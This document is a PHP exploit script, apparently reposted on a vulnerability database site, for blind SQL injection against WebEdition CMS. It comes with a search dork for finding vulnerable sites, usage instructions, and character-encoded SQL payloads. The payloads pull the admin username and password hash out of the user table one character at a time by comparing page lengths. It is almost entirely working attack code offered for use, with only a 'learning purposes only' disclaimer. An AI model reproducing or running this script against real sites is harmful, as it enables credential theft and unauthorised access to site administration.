<?php ini_set("max_execution_time",0); print_r(' ############################################################### # # WebEdition CMS - Blind SQL Injection Exploit # # Vulnerability discovered by: Lidloses_Auge # Exploit coded by: Lidloses_Auge # Special Greetz to: H4x0r007 (who sent me a vulnerable Page) # Greetz to: -=Player=- , Suicide, g4ms3, enco, # GPM, Free-Hack, Ciphercrew, h4ck-y0u # Date: 20.08.2008 # ############################################################### # # Dork: inurl:we_objectID= # Admin Panel: [Target]/webEdition/ # Usage: php '.$argv[0].' [Target] [Userid] # Example for http://www.site.com/en/****.php?we_objectID=21 # => php '.$argv[0].' http://www.site.com/en/****.php?we_objectID=21 1 # ############################################################### '); if ($argc > 1) { $url = $argv[1]; if ($argc < 3) { $userid = 1; } else { $userid = $argv[2]; } $p1 = chr(39).chr(97).chr(110).chr(100).chr(43).chr(97).chr(115).chr(99) .chr(105).chr(105).chr(40).chr(115).chr(117).chr(98).chr(115).chr(116).chr(114) .chr(105).chr(110).chr(103).chr(40).chr(40).chr(115).chr(101).chr(108).chr(101) .chr(99).chr(116).chr(43).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100) .chr(43).chr(102).chr(114).chr(111).chr(109).chr(43).chr(116).chr(98).chr(108) .chr(85).chr(115).chr(101).chr(114).chr(43).chr(119).chr(104).chr(101).chr(114) .chr(101).chr(43).chr(105).chr(100).chr(61); $p2 = chr(43).chr(108).chr(105).chr(109).chr(105).chr(116).chr(43).chr(48) .chr(44).chr(49).chr(41).chr(44); $u1 = chr(39).chr(97).chr(110).chr(100).chr(43).chr(97).chr(115).chr(99) .chr(105).chr(105).chr(40).chr(115).chr(117).chr(98).chr(115).chr(116).chr(114) .chr(105).chr(110).chr(103).chr(40).chr(40).chr(115).chr(101).chr(108).chr(101) .chr(99).chr(116).chr(43).chr(117).chr(115).chr(101).chr(114).chr(110).chr(97) .chr(109).chr(101).chr(43).chr(102).chr(114).chr(111).chr(109).chr(43).chr(116) .chr(98).chr(108).chr(85).chr(115).chr(101).chr(114).chr(43).chr(119).chr(104) .chr(101).chr(114).chr(101).chr(43).chr(105).chr(100).chr(61); $u2 = chr(43).chr(108).chr(105).chr(109).chr(105).chr(116).chr(43).chr(48) .chr(44).chr(49).chr(41).chr(44); $r = strlen(file_get_contents($url."'and+1=1/*")); echo "\nStarting to Exploit:\n"; $w = strlen(file_get_contents($url."'and+1=0/*")); $t = abs((100-($w/$r*100))); echo "Password: "; for ($j = 1; $j <= 32; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url.$p1.$userid.$p2.$j.",1))%3E".$i."/*")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url.$p1.$userid.$p2.$j.",1))%3E".($i-1)."/*")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } } } echo "\nUsername: "; for ($i=1; $i <= 30; $i++) { $laenge = strlen(file_get_contents($url.$u1.$userid.$u2.$i.",1))!=0/*")); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; } } for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url.$u1.$userid.$u2.$j.",1))%3E".$i."/*")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url.$u.$j.",1))%3E".($i-1)."/*")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } } } } else { echo "\nExploiting failed: Not enough arguments?\n"; } ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论